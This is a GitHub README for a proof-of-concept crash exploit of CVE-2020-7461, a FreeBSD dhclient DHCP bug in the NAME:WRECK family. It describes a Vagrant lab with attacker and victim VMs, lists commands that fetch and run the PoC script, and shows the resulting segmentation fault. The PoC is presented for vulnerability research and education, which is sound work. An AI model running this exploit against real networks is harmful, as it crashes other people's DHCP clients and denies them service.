CVE-2020-7461
PoC for DHCP vulnerability (NAME:WRECK) in FreeBSD
MIT License
Stars
15
Ecosystems:
Python
CVE-2020-7461
PoC for DHCP vulnerability (NAME:WRECK) in FreeBSD
For educational purposes only
Environment
- Host: macOS 11.2.1
- Vagrant: 2.2.15
- Victim: FreeBSD 12.1-STABLE r364849
- Attacker: Ubuntu 20.04
Disclaimer
This PoC will cause DoS instead of RCE to prevent abuse.
PoC
Turn off DHCP server in VirtualBox
Launch VMs
$ cd victim
$ vagrant up
$ cd ..
$ cd attacker
$ vagrant up
$ vagrant ssh
vagrant@vagrant:~$ sudo apt -y update && apt -y install python3 python3-pip
vagrant@vagrant:~$ wget https://raw.githubusercontent.com/knqyf263/CVE-2020-7461/main/poc.py
vagrant@vagrant:~$ python3 poc.py
Sniffing...
Run dhclient
Open another terminal
$ cd victim
$ vagrant ssh
vagrant@freebsd:~ % sudo dhclient em1
DHCPREQUEST on em1 to 255.255.255.255 port 67
Invalid forward pointer in DHCP Domain Search option compression.
Segmentation fault
References
- https://www.forescout.com/company/resources/namewreck-breaking-and-fixing-dns-implementations/
- https://www.freebsd.org/security/advisories/FreeBSD-SA-20:26.dhclient.asc
Author
Teppei Fukuda